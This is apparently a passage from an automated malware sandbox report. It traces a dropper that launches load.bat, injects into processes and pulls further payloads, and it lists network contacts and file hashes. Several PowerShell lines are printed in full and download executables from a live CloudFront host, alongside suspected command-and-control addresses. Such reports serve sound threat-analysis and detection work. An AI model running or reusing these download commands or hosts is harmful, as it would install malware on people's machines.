Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2224 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2628 wrote to memory of 1732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 1732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 1732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2628 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2628 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2628 wrote to memory of 1120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 1120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 1120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2200 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe
PID 2200 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe
PID 2200 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe
PID 2628 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2200 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe
PID 2200 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe
PID 2200 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe
PID 3652 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 3652 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 3652 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 3652 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 4836 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4836 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4836 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4836 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4836 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2200 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe
PID 2200 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe
PID 2200 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe
PID 2912 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2912 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsn41DC.tmp\load.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=28381000 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe

"C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5024 -ip 5024

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 1016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"

C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe

"C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2200 -ip 2200

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 532

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

Network

Country Destination Domain Proto
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 108.156.61.188:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 188.61.156.108.in-addr.arpa udp
US 8.8.8.8:53 192.15.239.18.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 67.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 80.41.65.18.in-addr.arpa udp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 210.61.156.108.in-addr.arpa udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 240216234727901.mjj.xne26.cfd udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
DE 185.172.128.59:80 185.172.128.59 tcp
BG 94.156.35.76:80 240216234727901.mjj.xne26.cfd tcp
US 8.8.8.8:53 153.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 note.padd.cn.com udp
DE 185.172.128.76:80 185.172.128.76 tcp
US 8.8.8.8:53 76.35.156.94.in-addr.arpa udp
RO 176.97.76.106:80 note.padd.cn.com tcp
US 8.8.8.8:53 76.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 106.76.97.176.in-addr.arpa udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 monoblocked.com udp
RU 45.130.41.108:443 monoblocked.com tcp
US 8.8.8.8:53 108.41.130.45.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 c.574859385.xyz udp
GB 37.221.125.202:443 c.574859385.xyz tcp
US 8.8.8.8:53 202.125.221.37.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 14.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
RU 91.215.85.66:15647 tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
FR 143.244.56.49:443 download.iolo.net tcp
US 8.8.8.8:53 49.56.244.143.in-addr.arpa udp
RU 91.215.85.66:15647 tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 145.155.9.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsn41DC.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\nsn41DC.tmp\load.bat

MD5 c03b3682569c40524152ba0ea7bc25ff
SHA1 670c137c03ade8b573e4084c12dcb1d00e377c20
SHA256 70e43edb60c75270e41a167cfc5e6c1b60a0d022b57812560006626c3904353f
SHA512 9b0f33cf044beb3a9f558e8a09f99b263c2b617169fa036876043b5e85a92eb5f0a2ed31accad878486dfdaa144f8b780ea14378ac2e0d3b273cf6100515019a

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_azlpfouc.lgs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c83cc8b95f9ca9b75499438b45880c2
SHA1 8973f5474624292ebccc9c7149d768b739d4df73
SHA256 e830a032f2cc93e30c235afc1ff7fa095fbccca8305a24ccc909c07d9d5e7af4
SHA512 9bb1c97b3b77f6daefa3bf329817673eaded16efe74590cf84a97c4936fc145ee7b7e167722abace83554293b36b6886ecce84f339cd0d211bf976de0a27b7c3

memory/4384-57-0x0000000073B10000-0x00000000742C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\i1.exe

MD5 ae73eb4cbe39e4a9e28a367331329a12
SHA1 fa827d6b4f9c94dd137fc24b201259a4c8293913
SHA256 5f302f2c568cfc3bef4f7690b84d15dd58caace21a60f76d807e909ff8f81e5e
SHA512 b8b28158002cdd797cfe9050d93ba7d3122ac9a6e308d60c13027546bcfde0fa17df38e980016c6bb91fec62b2b6a9acfc55b58a5983e2beab248aac469a9500

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a89739c1fa3a1cbdab8821893a1d2ca8
SHA1 fe9c5acb5ddceb4027cdce38e1b138f7daa02ef6
SHA256 c1ef6ddd816078ef2e8cd45a5010fdd62bfbae31c7bb9e4469462033f26605ca
SHA512 e6a837382e0e92cb4276298d6e36360c5c7f14d167c1dfebbabeeabc1f4755e54381f0e0a5406b955162ff7c034cc7b23984d350f67d2c687a13b69328ff15d3

memory/1120-78-0x00000000069C0000-0x0000000006A0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe

MD5 80e0fece33768e20034d106db0d36341
SHA1 ba12ccea1e640cdb5fedb0e9ac03aad09bdc9510
SHA256 8a6721d38d828ce4dbbef786174faf854f366b0bf6f07189033aafa53459a14e
SHA512 1292b73f6e0673a118ad726ab14dbcbbbe9d1245cac978e5752838b51cccabd4a286397faf7de27b98cd9ab88ea04fb46aa02ec3287d641b3056593f69606e7f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e659d112ad5453b1378a4b666ef3681
SHA1 825343aca4d67fbb9b195a852f6dc4b6bf001907
SHA256 2df426352af89a4120a633cbb5bfc9d1d79f6e0a2afcc7d1fd6d1a85491c271b
SHA512 2a47aca5be8a5006e7f80ffef2a8def2182aa0b30ddda1f4b81164a436d194343b0e1dcd779a01162c0553e9479724965c4dcab0cc6275b0e0435d70d8662ed2

C:\Users\Admin\AppData\Local\Temp\u1p4.1.zip

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

C:\Users\Admin\AppData\Local\Temp\u1p4.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

C:\Users\Admin\AppData\Local\Temp\u1p4.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

C:\Users\Admin\AppData\Local\Temp\u1p4.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/3652-202-0x000000006ECE0000-0x000000006EE5B000-memory.dmp

memory/3652-203-0x00007FFF9CED0000-0x00007FFF9D0C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u1p4.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

C:\Users\Admin\AppData\Local\Temp\261c2d90

MD5 d16113abda25d68f63c28da6f0f66796
SHA1 878ad80612b5a4cd992e6d1e28b13163eb7fcd50
SHA256 9cc195a235418dfdb5608f0f311ec8aa957b3c1c08c1e8ac981951bffd587bf1
SHA512 9b65dbffb0b03a8b0ccd982c6d9ed14f4b17b9309e247e61717d6b36b125943e6b9e773b17b7614ad9730738c618aa5d1ea9a04b6986d632c90056541558481a

C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-26 09:05

Reported

2024-04-26 09:08

Platform

win7-20240221-en

Max time kernel

117s

Max time network

118s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 236

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-26 09:05

Reported

2024-04-26 09:08

Platform

win10v2004-20240412-en

Max time kernel

149s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2348 wrote to memory of 3904 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2348 wrote to memory of 3904 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2348 wrote to memory of 3904 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3904 -ip 3904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 624

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 134.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 67.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 153.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 147.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

N/A